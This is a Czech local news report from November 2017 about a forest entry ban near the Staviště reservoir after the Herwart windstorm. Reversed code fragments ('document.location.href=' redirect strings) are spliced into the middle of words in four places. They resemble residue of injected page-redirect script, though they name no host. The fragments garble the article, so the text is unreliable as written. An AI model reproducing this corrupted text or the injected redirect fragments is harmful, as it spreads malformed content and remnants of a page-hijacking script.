Rainbow page separator

Zákaz vstupu do lesů kolem Staviště platí do konce ledna

Pondělí, 27. listopadu 2017

Žďár nad Sázavou / Až do konce ledna platí zákaz vstupu do lesních porostů u vodní nádrže Staviště, které byly vážně poškozeny při větrné smršti Herwart poslední říjnovou neděli. Některé tamní dosud s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojící stromy nejsou stabilní, a pokud nebudou vytěženy, což ještě nějakou dobu potrvá, chůze pod nimi znamená vážné ohrožení lidského zdraví či života. Mnoho vyvrácených, zlomených či jinak poškozených stromů je stále zaklíněných v porostech a kdykoliv mohou spadnout na zem. Žďárská radnice pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to opakovaně apeluje na lidi, aby zbytečně neriskovali.
„V posledních dnech jsme zaznamenali, že tam lidé stále chodí, přes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože riziko je opravdu vysoké. Zákaz u Staviště platí do konce ledna a v lesích Lesního družstva obcí Přibyslav do 10. února,“ informoval mluvčí žďárské radnice Jakub Axman.
Větrná bouře v okolí Žďáru [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž mimo jiné postihla značnou část lesů v majetku Lesního družstva obcí Přibyslav.
K vážně poškozeným oblastem s velkým množstvím polomového dřeva patří například také lesní porosty v okolí Velkého Dářka, Račína, Vojnova Městce, Velké Losenice, Vepřové, Nového Veselí a Bohdalova či mezi Bohdalcem a Ostrovem nad Oslavou.